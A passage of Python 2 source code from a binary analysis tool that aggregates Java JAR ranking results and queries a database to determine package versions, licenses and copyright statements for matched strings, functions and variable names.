packagelicensesperpkg[package] = packagelicenses
if package in uniquematcheslenperpkg:
uniquematcheslenperpkg[package] += uniquematcheslen
else:
uniquematcheslenperpkg[package] = uniquematcheslen
if dynamicres != {}:
aggregated = True
if 'uniquepackages' in dynamicres:
if dynamicres['uniquepackages'] != {}:
if not 'uniquepackages' in dynamicresfinal:
dynamicresfinal['uniquepackages'] = {}
for d in dynamicres['uniquepackages'].keys():
if d in dynamicresfinal['uniquepackages']:
dynamicresfinal['uniquepackages'][d] = list(set(dynamicresfinal['uniquepackages'][d] + dynamicres['uniquepackages'][d]))
else:
dynamicresfinal['uniquepackages'][d] = dynamicres['uniquepackages'][d]
if not aggregated:
return (jarfile, aggregated)
scores_sorted = sorted(scoresperpkg, key = lambda x: scoresperpkg.__getitem__(x), reverse=True)
rank = 1
reports = []
packagecopyrights = []
for s in scores_sorted:
try:
percentage = (scoresperpkg[s]/totalscore)*100.0
except:
percentage = 0.0
reports.append({'rank': rank, 'package': s, 'unique': uniqueMatchesperpkg.get(s,[]), 'uniquematcheslen': uniquematcheslenperpkg.get(s,0), 'percentage': percentage, 'packageversions': packageversionsperpkg.get(s, {}), 'packagelicenses': list(set(packagelicensesperpkg.get(s, []))), 'packagecopyrights': packagecopyrights})
rank = rank+1
if 'uniquepackages' in dynamicresfinal:
dynamicresfinal['namesmatched'] = reduce(lambda x, y: x + y, map(lambda x: len(x[1]), dynamicresfinal['uniquepackages'].items()))
else:
dynamicresfinal['namesmatched'] = 0
dynamicresfinal['uniquematches'] = uniquematches
dynamicresfinal['totalnames'] = namesmatched
dynamicresfinal['packages'] = packagesmatched
unmatched = list(set(unmatched))
unmatched.sort()
rankres['unmatched'] = unmatched
rankres['ignored'] = list(set(ignored))
rankres['matchedlines'] = matchedlines
rankres['matchednonassignedlines'] = matchednonassignedlines
rankres['matchednotclonelines'] = matchednotclonelines
rankres['unmatchedlines'] = unmatchedlines
rankres['extractedlines'] = extractedlines
rankres['nonUniqueAssignments'] = nonUniqueAssignments
rankres['nonUniqueMatches'] = nonUniqueMatches
rankres['reports'] = reports
## now write the new result
## TODO: only do this if there actually is an aggregate result
filehash = jarreport['checksum']
leaf_file = open(os.path.join(topleveldir, "filereports", "%s-filereport.pickle" % filehash), 'rb')
leafreports = cPickle.load(leaf_file)
leaf_file.close()
leafreports['ranking'] = (rankres, dynamicresfinal, {'classes': classmatches, 'fields': fieldmatches, 'sources': sourcematches}, 'Java')
leaf_file = open(os.path.join(topleveldir, "filereports", "%s-filereport.pickle" % filehash), 'wb')
leafreports = cPickle.dump(leafreports, leaf_file)
leaf_file.close()
return (jarfile, aggregated)
def prune(uniques, package):
if have_counter:
uniqueversions = collections.Counter()
else:
uniqueversions = {}
linesperversion = {}
for u in uniques:
(line, res) = u
versions = set()
for r in res:
(checksum, linenumber, versionfilenames) = r
map(lambda x: versions.add(x[0]), versionfilenames)
for version in versions:
if version in linesperversion:
linesperversion[version].add(line)
else:
linesperversion[version] = set([line])
if have_counter:
uniqueversions.update(versions)
else:
for version in versions:
if version in uniqueversions:
uniqueversions[version] += 1
else:
uniqueversions[version] = 1
## there is only one version, so no need to continue
if len(uniqueversions.keys()) == 1:
return uniques
pruneme = set()
unique_sorted_rev = sorted(uniqueversions, key = lambda x: uniqueversions.__getitem__(x), reverse=True)
unique_sorted = sorted(uniqueversions, key = lambda x: uniqueversions.__getitem__(x))
equivalents = set()
for l in unique_sorted_rev:
if l in pruneme:
continue
if l in equivalents:
continue
linesperversion_l = set(linesperversion[l])
pruneremove = set()
for k in unique_sorted:
if uniqueversions[k] == uniqueversions[l]:
## Both versions have the same amount of identifiers, so
## could be the same. If so, add to 'equivalents'
## and skip all equivalents since the results would be the
## same as with the current 'l' and no versions would be
## pruned that weren't already pruned.
if linesperversion[k] == linesperversion_l:
equivalents.add(k)
continue
if uniqueversions[k] > uniqueversions[l]:
break
if set(linesperversion[k]).issubset(linesperversion_l):
pruneme.add(k)
pruneremove.add(k)
## make the inner loop a bit shorter
for k in pruneremove:
unique_sorted.remove(k)
## TODO: pruneme might have length 0, so uniques can be returned. Verify this.
notpruned = set(uniqueversions.keys()).difference(pruneme)
newuniques = []
for u in uniques:
(line, res) = u
newres = []
for r in res:
(checksum, linenumber, versionfilenames) = r
filterres = filter(lambda x: x[0] in notpruned, versionfilenames)
if filterres != []:
newres.append((checksum, linenumber, filterres))
newuniques.append((line, newres))
return newuniques
def determinelicense_version_copyright(unpackreports, scantempdir, topleveldir, processors, scanenv, batcursors, batcons, scandebug=False, unpacktempdir=None):
## sanity check if the database really is there
if batcursors[0] == None:
return None
## the environment might have changed and been cleaned up,
## so overwrite the old one
determineversion = False
if scanenv.get('BAT_RANKING_VERSION', 0) == '1':
determineversion = True
determinelicense = False
if scanenv.get('BAT_RANKING_LICENSE', 0) == '1':
determinelicense = True
determinecopyright = False
if scanenv.get('BAT_RANKING_COPYRIGHT', 0) == '1':
determinecopyright = True
## only continue if there actually is a need
if not determinelicense and not determineversion and not determinecopyright:
return None
## ignore files which don't have ranking results
rankingfiles = set()
filehashseen = set()
hashtoname = {}
rankingfilesperlanguage = {}
for i in unpackreports:
if not 'checksum' in unpackreports[i]:
continue
if not 'tags' in unpackreports[i]:
continue
if not 'identifier' in unpackreports[i]['tags']:
continue
filehash = unpackreports[i]['checksum']
if filehash in hashtoname:
hashtoname[filehash].append(i)
else:
hashtoname[filehash] = [i]
if filehash in filehashseen:
continue
filehashseen.add(filehash)
if not os.path.exists(os.path.join(topleveldir, "filereports", "%s-filereport.pickle" % filehash)):
continue
leaf_file = open(os.path.join(topleveldir, "filereports", "%s-filereport.pickle" % filehash), 'rb')
leafreports = cPickle.load(leaf_file)
leaf_file.close()
if not 'identifier' in leafreports:
continue
language = leafreports['identifier']['language']
if language in rankingfilesperlanguage:
rankingfilesperlanguage[language].add(i)
else:
rankingfilesperlanguage[language] = set([i])
if len(rankingfilesperlanguage) == 0:
return None
## Some methods use a database to lookup renamed packages.
clones = {}
clonedb = scanenv.get('HAVE_CLONE_DB')
if clonedb == 1:
conn = batcons[0]
c = batcursors[0]
c.execute("SELECT originalname,newname from renames")
clonestmp = c.fetchall()
conn.commit()
for cl in clonestmp:
(originalname,newname) = cl
if not originalname in clones:
clones[originalname] = newname
## suck the average string scores database into memory. Even with a few million packages
## this will not cost much memory and it prevents many database lookups.
avgscores = {}
for language in avgstringsdbperlanguagetable:
if not language in rankingfilesperlanguage:
continue
if not language in scanenv['supported_languages']:
continue
## open the database containing all the strings that were extracted
## from source code.
conn = batcons[0]
c = batcursors[0]
avgscores[language] = {}
avgquery = "select package, avgstrings from %s" % avgstringsdbperlanguagetable[language]
c.execute(avgquery)
res = c.fetchall()
conn.commit()
for r in filter(lambda x: x[1] != 0, res):
avgscores[language][r[0]] = r[1]
## create a queue for tasks, with a few threads reading from the queue
## and looking up results and putting them in a result queue
scanmanager = multiprocessing.Manager()
res = []
if processors == None:
processamount = 1
else:
processamount = processors
## now proces each file per language
for language in rankingfilesperlanguage:
if len(rankingfilesperlanguage[language]) == 0:
continue
## creating new queues (max: amount of tasks, or CPUs, whichever is the smallest)
scanqueue = multiprocessing.JoinableQueue(maxsize=0)
reportqueue = scanmanager.Queue(maxsize=0)
lock = Lock()
ignorecache = scanmanager.dict()
lookup_tasks = map(lambda x: (unpackreports[x]['checksum'], os.path.join(unpackreports[x]['realpath'], unpackreports[x]['name'])),rankingfilesperlanguage[language])
map(lambda x: scanqueue.put(x), lookup_tasks)
minprocessamount = min(len(lookup_tasks), processamount)
processpool = []
for i in range(0,minprocessamount):
p = multiprocessing.Process(target=lookup_identifier, args=(scanqueue,reportqueue, batcursors[i], batcons[i],scanenv,topleveldir,avgscores,clones,scandebug,ignorecache, lock))
processpool.append(p)
p.start()
scanqueue.join()
while True:
try:
val = reportqueue.get_nowait()
res.append(val)
reportqueue.task_done()
except Queue.Empty, e:
## Queue is empty
break
reportqueue.join()
for p in processpool:
p.terminate()
## finally shut down the scan manager
scanmanager.shutdown()
for filehash in res:
if filehash != None:
if filehash in hashtoname:
for w in hashtoname[filehash]:
unpackreports[w]['tags'].append('ranking')
## optionally aggregate the JAR files
if 'Java' in rankingfilesperlanguage:
cleanclasses = False
if scanenv.get('AGGREGATE_CLEAN', 0) == '1':
cleanclasses = True
pool = multiprocessing.Pool(processes=processors)
rankedjars = aggregatejars(unpackreports, scantempdir, topleveldir, pool, scanenv, cleanclasses, scandebug=False, unpacktempdir=None)
pool.terminate()
for r in rankedjars:
## results are now aggregated, so add the JAR file to
## the list of rankingfiles for Java
rankingfilesperlanguage['Java'].add(r)
## .class files might have been removed at this point, so sanity check first
rankingfiles = set()
filehashseen = set()
## sanity check to see if all the ranking files are still there
for l in rankingfilesperlanguage:
newrankingfiles = set()
for i in rankingfilesperlanguage[l]:
if i in unpackreports:
newrankingfiles.add(i)
rankingfilesperlanguage[l] = newrankingfiles
## Determine the most likely versions for each of the scanned binaries.
## Currently finding the version is based on unique matches that were found.
## If determinelicense or determinecopyright are set licenses and copyright statements
## are also extracted.
pruning = False
if 'BAT_KEEP_VERSIONS' in scanenv:
keepversions = int(scanenv.get('BAT_KEEP_VERSIONS', 0))
if keepversions > 0:
## there need to be a minimum of unique hits (like strings), otherwise
## it's silly
if 'BAT_MINIMUM_UNIQUE' in scanenv:
minimumunique = int(scanenv.get('BAT_MINIMUM_UNIQUE', 0))
if minimumunique > 0:
pruning = True
## first determine whether or not there are any unique links at all and
## if there should be database queries
#alluniques = set()
connectdb = False
for language in rankingfilesperlanguage:
if connectdb:
break
## keep a list of versions per sha256, since source files often are in more than one version
for rankingfile in rankingfilesperlanguage[language]:
if connectdb:
break
unpackreport = unpackreports[rankingfile]
## read the pickle
filehash = unpackreport['checksum']
leaf_file = open(os.path.join(topleveldir, "filereports", "%s-filereport.pickle" % filehash), 'rb')
leafreports = cPickle.load(leaf_file)
leaf_file.close()
(res, functionRes, variablepvs, language) = leafreports['ranking']
if res == None and functionRes == {} and variablepvs == {}:
continue
## First process all the string identifiers
if res != None:
newreports = []
for r in res['reports']:
unique = r['unique']
uniques = set(map(lambda x: x[0], unique))
#alluniques.update(uniques)
if unique != []:
connectdb = True
break
if 'versionresults' in functionRes:
for package in functionRes['versionresults'].keys():
if not 'uniquepackages' in functionRes:
continue
connectdb = True
break
if variablepvs != {}:
if language == 'C':
if 'uniquepackages' in variablepvs:
if variablepvs['uniquepackages'] != {}:
connectdb = True
break
if not connectdb:
return
scanmanager = multiprocessing.Manager()
sha256_filename_query = "select version, pathname from processed_file where checksum=%s"
sha256_license_query = "select distinct license, scanner from licenses where checksum=%s"
sha256_copyright_query = "select distinct copyright, type from extracted_copyright where checksum=%s"
for language in rankingfilesperlanguage:
## keep a list of versions per sha256, since source files often are in more than one version
sha256_versions = {}
for rankingfile in rankingfilesperlanguage[language]:
unpackreport = unpackreports[rankingfile]
## read the pickle
filehash = unpackreport['checksum']
leaf_file = open(os.path.join(topleveldir, "filereports", "%s-filereport.pickle" % filehash), 'rb')
leafreports = cPickle.load(leaf_file)
leaf_file.close()
(res, functionRes, variablepvs, language) = leafreports['ranking']
## indicate whether or not the pickle should be written back to disk.
## If uniquematches is empty, functionRes is empty, and variablepvs
## is also empty, then nothing needs to be written.
changed = False
if res == None and functionRes == {} and variablepvs == {}:
continue
## First process all the string identifiers
if res != None:
newreports = []
for r in res['reports']:
rank = r['rank']
package = r['package']
unique = r['unique']
uniquematcheslen = r['uniquematcheslen']
percentage = r['percentage']
packageversions = r['packageversions']
packagelicenses = r['packagelicenses']
packagecopyrights = r['packagecopyrights']
if unique == []:
## Continue to the next item if there are no unique matches
newreports.append(r)
continue
## There are unique matches, so results should
## be written back to disk
changed = True
newuniques = []
newpackageversions = {}
packagecopyrights = []
packagelicenses = []
uniques = set(map(lambda x: x[0], unique))
lenuniques = len(uniques)
## first grab all possible checksums, plus associated line numbers
## for this string. Since these are unique strings they will only be
## present in the package (or clones of the package).
processpool = []
vsha256s = []
scanqueue = multiprocessing.JoinableQueue(maxsize=0)
reportqueue = scanmanager.Queue(maxsize=0)
map(lambda x: scanqueue.put(x), uniques)
minprocessamount = min(len(uniques), processamount)
for i in range(0,minprocessamount):
p = multiprocessing.Process(target=grab_sha256_parallel, args=(scanqueue,reportqueue,batcursors[i], batcons[i], language, 'string'))
processpool.append(p)
p.start()
scanqueue.join()
while True:
try:
val = reportqueue.get_nowait()
vsha256s.append(val)
reportqueue.task_done()
except Queue.Empty, e:
## Queue is empty
break
reportqueue.join()
for p in processpool:
p.terminate()
## for each combination (line,sha256,linenumber) store per checksum
## the line and linenumber(s). The checksums are used to look up version
## and filename information.
sha256_scan_versions = {}
tmplines = {}
for l in vsha256s:
(line, versionsha256s) = l
for s in versionsha256s:
(checksum, linenumber) = s
if not checksum in sha256_versions:
if checksum in sha256_scan_versions:
sha256_scan_versions[checksum].add((line, linenumber))
else:
sha256_scan_versions[checksum] = set([(line, linenumber)])
else:
## results are already know, so copy
for v in sha256_versions[checksum]:
(version, filename) = v
if not line in tmplines:
tmplines[line] = []
tmplines[line].append((checksum, linenumber, sha256_versions[checksum]))
processpool = []
fileres = []
scanqueue = multiprocessing.JoinableQueue(maxsize=0)
reportqueue = scanmanager.Queue(maxsize=0)
map(lambda x: scanqueue.put(x), sha256_scan_versions.keys())
minprocessamount = min(len(sha256_scan_versions.keys()), processamount)
for i in range(0,minprocessamount):
p = multiprocessing.Process(target=grab_sha256_filename, args=(scanqueue,reportqueue,batcursors[i], batcons[i], sha256_filename_query))
processpool.append(p)
p.start()
scanqueue.join()
while True:
try:
val = reportqueue.get_nowait()
fileres.append(val)
reportqueue.task_done()
except Queue.Empty, e:
## Queue is empty
break
reportqueue.join()
for p in processpool:
p.terminate()
resdict = {}
map(lambda x: resdict.update(x), fileres)
## construct the full information needed by other scans
for checksum in resdict:
versres = resdict[checksum]
for l in sha256_scan_versions[checksum]:
(line, linenumber) = l
if not line in tmplines:
tmplines[line] = []
## TODO: store (checksum, linenumber(s), versres)
tmplines[line].append((checksum, linenumber, versres))
for v in versres:
(version, filename) = v
if checksum in sha256_versions:
sha256_versions[checksum].append((version, filename))
else:
sha256_versions[checksum] = [(version, filename)]
for l in tmplines.keys():
newuniques.append((l, tmplines[l]))
## optionally prune version information
if pruning:
if len(newuniques) > minimumunique:
newuniques = prune(newuniques, package)
## optionally fill two lists with sha256 for license schanning and copyright scanning
licensesha256s = []
copyrightsha256s = []
for u in newuniques:
versionsha256s = u[1]
vseen = set()
if determinelicense:
licensesha256s += map(lambda x: x[0], versionsha256s)
if determinecopyright:
copyrightsha256s += map(lambda x: x[0], versionsha256s)
for s in versionsha256s:
(checksum, linenumber, versionfilenames) = s
for v in versionfilenames:
(version, filename) = v
if version in vseen:
continue
if version in newpackageversions:
newpackageversions[version] = newpackageversions[version] + 1
else:
newpackageversions[version] = 1
vseen.add(version)
## Ideally the version number should be stored with the license.
## There are good reasons for this: files are sometimes collectively
## relicensed when there is a new release (example: Samba 3.2 relicensed
## to GPLv3+) so the version number can be very significant for licensing.
## determinelicense and determinecopyright *always* imply determineversion
## TODO: store license with version number.
if determinelicense:
if len(licensesha256s) != 0:
licensesha256s = set(licensesha256s)
processpool = []
scanqueue = multiprocessing.JoinableQueue(maxsize=0)
reportqueue = scanmanager.Queue(maxsize=0)
map(lambda x: scanqueue.put(x), licensesha256s)
minprocessamount = min(len(licensesha256s), processamount)
for i in range(0,minprocessamount):
p = multiprocessing.Process(target=grab_sha256_license, args=(scanqueue,reportqueue,batcursors[i], batcons[i], sha256_license_query))
processpool.append(p)
p.start()
scanqueue.join()
while True:
try:
val = reportqueue.get_nowait()
packagelicenses.append(val)
reportqueue.task_done()
except Queue.Empty, e:
## Queue is empty
break
reportqueue.join()
for p in processpool:
p.terminate()
packagelicenses_tmp = []
for p in packagelicenses:
packagelicenses_tmp += reduce(lambda x,y: x + y, p.values(), [])
packagelicenses = list(set(packagelicenses_tmp))
if determinecopyright:
if len(copyrightsha256s) != 0:
processpool = []
scanqueue = multiprocessing.JoinableQueue(maxsize=0)
reportqueue = scanmanager.Queue(maxsize=0)
map(lambda x: scanqueue.put(x), copyrightsha256s)
minprocessamount = min(len(copyrightsha256s), processamount)
for i in range(0,minprocessamount):
p = multiprocessing.Process(target=grab_sha256_copyright, args=(scanqueue,reportqueue,batcursors[i], batcons[i], sha256_copyright_query))
processpool.append(p)
p.start()
scanqueue.join()
while True:
try:
val = reportqueue.get_nowait()
packagecopyrights.append(val)
reportqueue.task_done()
except Queue.Empty, e:
## Queue is empty
break
reportqueue.join()
for p in processpool:
p.terminate()
## result is a list of {sha256sum: list of copyright statements}
packagecopyrights_tmp = []
for p in packagecopyrights:
packagecopyrights_tmp += reduce(lambda x,y: x + y, p.values(), [])
packagecopyrights = list(set(packagecopyrights_tmp))
#newreports.append((rank, package, newuniques, uniquematcheslen, percentage, newpackageversions, packagelicenses, packagecopyrights))
newreports.append({'rank': rank, 'package': package, 'unique': newuniques, 'uniquematcheslen': uniquematcheslen, 'percentage': percentage, 'packageversions': newpackageversions, 'packagelicenses': packagelicenses, 'packagecopyrights': packagecopyrights})
res['reports'] = newreports
## Then process the results for the function names
if 'versionresults' in functionRes:
for package in functionRes['versionresults'].keys():
if not 'uniquepackages' in functionRes:
continue
if not package in functionRes['uniquepackages']:
continue
changed = True
functionnames = functionRes['uniquepackages'][package]
## right now only C is supported. TODO: fix this for other languages such as Java.
processpool = []
vsha256s = []
scanqueue = multiprocessing.JoinableQueue(maxsize=0)
reportqueue = scanmanager.Queue(maxsize=0)
map(lambda x: scanqueue.put(x), functionnames)
minprocessamount = min(len(functionnames), processamount)
for i in range(0,minprocessamount):
p = multiprocessing.Process(target=grab_sha256_parallel, args=(scanqueue,reportqueue,batcursors[i], batcons[i], 'C', 'function'))
processpool.append(p)
p.start()
scanqueue.join()
while True:
try:
val = reportqueue.get_nowait()
vsha256s.append(val)
reportqueue.task_done()
except Queue.Empty, e:
## Queue is empty
break
reportqueue.join()
for p in processpool:
p.terminate()
sha256_scan_versions = {}
tmplines = {}
for p in vsha256s:
(functionname, vres) = p
for s in vres:
(checksum, linenumber) = s
if not checksum in sha256_versions:
if checksum in sha256_scan_versions:
sha256_scan_versions[checksum].add((functionname, linenumber))
else:
sha256_scan_versions[checksum] = set([(functionname, linenumber)])
else:
for v in sha256_versions[checksum]:
(version, filename) = v
if not functionname in tmplines:
tmplines[functionname] = []
tmplines[functionname].append((checksum, linenumber, sha256_versions[checksum]))
fileres = []
if len(sha256_scan_versions.keys()) != 0:
processpool = []
scanqueue = multiprocessing.JoinableQueue(maxsize=0)
reportqueue = scanmanager.Queue(maxsize=0)
map(lambda x: scanqueue.put(x), sha256_scan_versions.keys())
minprocessamount = min(len(sha256_scan_versions.keys()), processamount)
for i in range(0,minprocessamount):
p = multiprocessing.Process(target=grab_sha256_filename, args=(scanqueue,reportqueue,batcursors[i], batcons[i], sha256_filename_query))
processpool.append(p)
p.start()
scanqueue.join()
while True:
try:
val = reportqueue.get_nowait()
fileres.append(val)
reportqueue.task_done()
except Queue.Empty, e:
## Queue is empty
break
reportqueue.join()
for p in processpool:
p.terminate()
resdict = {}
map(lambda x: resdict.update(x), fileres)
## construct the full information needed by other scans
for checksum in resdict:
versres = resdict[checksum]
for l in sha256_scan_versions[checksum]:
(functionname, linenumber) = l
if not functionname in tmplines:
tmplines[functionname] = []
## TODO: store (checksum, linenumber(s), versres)
tmplines[functionname].append((checksum, linenumber, versres))
for v in versres:
if checksum in sha256_versions:
sha256_versions[checksum].append((v[0], v[1]))
else:
sha256_versions[checksum] = [(v[0], v[1])]
for l in tmplines.keys():
functionRes['versionresults'][package].append((l, tmplines[l]))
newresults = {}
for package in functionRes['versionresults'].keys():
newuniques = functionRes['versionresults'][package]
## optionally prune version information
if pruning:
if len(newuniques) > minimumunique:
newuniques = prune(newuniques, package)
newresults[package] = newuniques
uniqueversions = {}
functionRes['packages'][package] = []
if have_counter:
vs = collections.Counter()
else:
vs = {}
for u in newuniques:
versionsha256s = u[1]
for s in versionsha256s:
(checksum, linenumber, versionfilenames) = s
if have_counter:
vs.update(set(map(lambda x: x[0], versionfilenames)))
else:
for v in set(map(lambda x: x[0], versionfilenames)):
if v in vs:
vs[v] += 1
else:
vs[v] = 1
for v in vs:
functionRes['packages'][package].append((v, vs[v]))
functionRes['versionresults'] = newresults
## Then process the results for the variable names
if variablepvs != {}:
if language == 'C':
if 'uniquepackages' in variablepvs:
if variablepvs['uniquepackages'] != {}:
changed = True
for package in variablepvs['uniquepackages']:
vartype = 'variable'
if 'type' in variablepvs:
vartype = 'variable'
if variablepvs['type'] == 'linuxkernel':
vartype = 'kernelvariable'
uniques = variablepvs['uniquepackages'][package]
processpool = []
vsha256s = []
scanqueue = multiprocessing.JoinableQueue(maxsize=0)
reportqueue = scanmanager.Queue(maxsize=0)
map(lambda x: scanqueue.put(x), uniques)
minprocessamount = min(len(uniques), processamount)
for i in range(0,minprocessamount):
p = multiprocessing.Process(target=grab_sha256_parallel, args=(scanqueue,reportqueue,batcursors[i], batcons[i], language, vartype))
processpool.append(p)
p.start()
scanqueue.join()
while True:
try:
val = reportqueue.get_nowait()
vsha256s.append(val)
reportqueue.task_done()
except Queue.Empty, e:
## Queue is empty
break
reportqueue.join()
for p in processpool:
p.terminate()
sha256_scan_versions = {}
tmplines = {}
for p in vsha256s:
(variablename, varres) = p
for s in varres:
(checksum, linenumber) = s
if not checksum in sha256_versions:
if checksum in sha256_scan_versions:
sha256_scan_versions[checksum].add((variablename, linenumber))
else:
sha256_scan_versions[checksum] = set([(variablename, linenumber)])
else:
for v in sha256_versions[checksum]:
(version, filename) = v
if not variablename in tmplines:
tmplines[variablename] = []
tmplines[variablename].append((checksum, linenumber, sha256_versions[checksum]))
resdict = {}
if len(sha256_scan_versions.keys()) != 0:
processpool = []
fileres = []
scanqueue = multiprocessing.JoinableQueue(maxsize=0)
reportqueue = scanmanager.Queue(maxsize=0)
map(lambda x: scanqueue.put(x), sha256_scan_versions.keys())
minprocessamount = min(len(sha256_scan_versions.keys()), processamount)
for i in range(0,minprocessamount):
p = multiprocessing.Process(target=grab_sha256_filename, args=(scanqueue,reportqueue,batcursors[i], batcons[i], sha256_filename_query))
processpool.append(p)
p.start()
scanqueue.join()
while True:
try:
val = reportqueue.get_nowait()
fileres.append(val)
reportqueue.task_done()
except Queue.Empty, e:
## Queue is empty
break
reportqueue.join()
for p in processpool:
p.terminate()
map(lambda x: resdict.update(x), fileres)
## construct the full information needed by other scans
for checksum in resdict:
versres = resdict[checksum]
for l in sha256_scan_versions[checksum]:
(variablename, linenumber) = l
if not variablename in tmplines:
tmplines[variablename] = []
## TODO: store (checksum, linenumber(s), versres)
tmplines[variablename].append((checksum, linenumber, versres))
for v in versres:
if checksum in sha256_versions:
sha256_versions[checksum].append((v[0], v[1]))
else:
sha256_versions[checksum] = [(v[0], v[1])]
for l in tmplines.keys():
variablepvs['versionresults'][package].append((l, tmplines[l]))
newresults = {}
for package in variablepvs['versionresults'].keys():
newuniques = variablepvs['versionresults'][package]
## optionally prune version information
if pruning:
if len(newuniques) > minimumunique:
newuniques = prune(newuniques, package)
newresults[package] = newuniques
uniqueversions = {}
variablepvs['packages'][package] = []
if have_counter:
vs = collections.Counter()
else:
vs = {}
for u in newuniques:
versionsha256s = u[1]
for s in versionsha256s:
(checksum, linenumber, versionfilenames) = s
if have_counter:
vs.update(set(map(lambda x: x[0], versionfilenames)))
else:
for v in set(map(lambda x: x[0], versionfilenames)):
if v in vs:
vs[v] += 1
else:
vs[v] = 1
for v in vs:
variablepvs['packages'][package].append((v, vs[v]))
variablepvs['versionresults'] = newresults
if changed:
leafreports['ranking'] = (res, functionRes, variablepvs, language)
leafreports['tags'] = list(set(leafreports['tags'] + ['ranking']))
leaf_file = open(os.path.join(topleveldir, "filereports", "%s-filereport.pickle" % filehash), 'wb')
leafreports = cPickle.dump(leafreports, leaf_file)
leaf_file.close()
unpackreport['tags'].append('ranking')
## finally shut down the scan manager
scanmanager.shutdown()
## grab variable names.
def grab_sha256_varname(scanqueue, reportqueue, cursor, conn, query):
while True:
sha256sum = scanqueue.get(timeout=2592000)
c.execute(query, (sha256sum,))
results = c.fetchall()
conn.commit()
reportqueue.put({sha256sum: results})
scanqueue.task_done()
def grab_sha256_filename(scanqueue, reportqueue, cursor, conn, query):
while True:
sha256sum = scanqueue.get(timeout=2592000)
cursor.execute(query, (sha256sum,))
results = cursor.fetchall()
conn.commit()
reportqueue.put({sha256sum: results})
scanqueue.task_done()
## grab copyright statements from the license database
def grab_sha256_copyright(scanqueue, reportqueue, cursor, conn, query):
while True:
sha256sum = scanqueue.get(timeout=2592000)
cursor.execute(query, (sha256sum,))
results = cursor.fetchall()
conn.commit()
## 'statements' are not very accurate so ignore those
results = filter(lambda x: x[1] != 'statement', results)
reportqueue.put({sha256sum: results})
scanqueue.task_done()
## grab licenses from the license database
def grab_sha256_license(scanqueue, reportqueue, cursor, conn, query):
while True:
sha256sum = scanqueue.get(timeout=2592000)
cursor.execute(query, (sha256sum,))
results = cursor.fetchall()
conn.commit()
reportqueue.put({sha256sum: results})
scanqueue.task_done()
def grab_sha256_parallel(scanqueue, reportqueue, cursor, conn, language, querytype):
stringquery = "select distinct checksum, linenumber, language from extracted_string where stringidentifier=%s and language=%s"
functionquery = "select distinct checksum, linenumber, language from extracted_function where functionname=%s"
variablequery = "select distinct checksum, linenumber, language, type from extracted_name where name=%s"
kernelvarquery = "select distinct checksum, linenumber, language, type from extracted_name where name=%s"
while True:
res = None
line = scanqueue.get(timeout=2592000)
if querytype == "string":
cursor.execute(stringquery, (line,language))
res = cursor.fetchall()
elif querytype == 'function':
cursor.execute(functionquery, (line,))
res = cursor.fetchall()
elif querytype == 'variable':
cursor.execute(variablequery, (line,))
res = cursor.fetchall()
res = filter(lambda x: x[3] == 'variable', res)
elif querytype == 'kernelvariable':
cursor.execute(kernelvarquery, (line,))
res = cursor.fetchall()
res = filter(lambda x: x[3] == 'kernelsymbol', res)
conn.commit()
if res != None:
res = filter(lambda x: x[2] == language, res)
## TODO: make a list of line numbers
res = map(lambda x: (x[0], x[1]), res)
reportqueue.put((line, res))
scanqueue.task_done()
def extractJava(javameta, scanenv, funccursor, funcconn, clones):
dynamicRes = {} # {'namesmatched': 0, 'totalnames': int, 'uniquematches': int, 'packages': {} }
namesmatched = 0
uniquematches = 0
uniquepackages = {}
variablepvs = {}
if 'fields' in javameta:
fields = javameta['fields']
else:
fields = []
if 'classes' in javameta:
classes = javameta['classes']
else:
classes = []
if 'sourcefiles' in javameta:
sourcefiles = javameta['sourcefiles']
else:
sourcefiles = []
classname = javameta['classes']
methods = javameta['methods']
fields = javameta['fields']
sourcefile = javameta['sourcefiles']
if 'BAT_METHOD_SCAN' in scanenv:
query = "select distinct package from functionnamecache_java where functionname=%s"
for meth in methods:
if meth == 'main':
continue
funccursor.execute(query, (meth,))
res = funccursor.fetchall()
funcconn.commit()
if res != []:
namesmatched += 1
packages_tmp = []
for r in res:
if r[0] in clones:
package_tmp = clones[r[0]]
packages_tmp.append(package_tmp)
else:
packages_tmp.append(r[0])
packages_tmp = list(set(packages_tmp))
## unique match
if len(packages_tmp) == 1:
uniquematches += 1
if packages_tmp[0] in uniquepackages:
uniquepackages[packages_tmp[0]].append(meth)
else:
uniquepackages[packages_tmp[0]] = [meth]
dynamicRes['namesmatched'] = namesmatched
dynamicRes['totalnames'] = len(set(methods))
dynamicRes['uniquepackages'] = uniquepackages
dynamicRes['uniquematches'] = uniquematches
## unique matches found.
if uniquematches != 0:
dynamicRes['packages'] = {}
## Now variable names
classpvs = {}
sourcepvs = {}
fieldspvs = {}
## classes and source file names are searched in a similar way.
## Of course, it could be that the source file is different from the
## class file (apart from the extension of course) but this is very
## uncommon. TODO: merge class name and source file name searching
if 'BAT_CLASSNAME_SCAN' in scanenv:
classes = set(map(lambda x: x.split('$')[0], classes))
query = "select package from classcache_java where classname=%s"
for i in classes:
pvs = []
## first try the name as found in the binary. If it can't
## be found and has dots in it split it on '.' and
## use the last component only.
classname = i
funccursor.execute(query, (classname,))
classres = funccursor.fetchall()
funcconn.commit()
if classres == []:
## check just the last component
classname = classname.split('.')[-1]
classres = funccursor.execute(query, (classname,))
classres = funccursor.fetchall()
funcconn.commit()
## check the cloning database
if classres != []:
classres_tmp = []
for r in classres:
if r[0] in clones:
class_tmp = clones[r[0]]
classres_tmp.append(class_tmp)
else:
classres_tmp.append(r[0])
classres_tmp = list(set(classres_tmp))
classres = map(lambda x: (x, 0), classres_tmp)
classpvs[classname] = classres
for i in javameta['sourcefiles']:
pvs = []
## first try the name as found in the binary. If it can't
## be found and has dots in it split it on '.' and
## use the last component only.
if i.lower().endswith('.java'):
classname = i[0:-5]
else:
classname = i
## first try the name as found in the binary. If it can't
## be found and has dots in it split it on '.' and
## use the last component only.
funccursor.execute(query, (classname,))
classres = funccursor.fetchall()
funcconn.commit()
## check the cloning database
if classres != []:
classres_tmp = []
for r in classres:
if r[0] in clones:
class_tmp = clones[r[0]]
classres_tmp.append(class_tmp)
else:
classres_tmp.append(r[0])
classres_tmp = set(classres_tmp)
classres = map(lambda x: (x, 0), classres_tmp)
sourcepvs[classname] = classres
## A list of Java fields that should be ignored
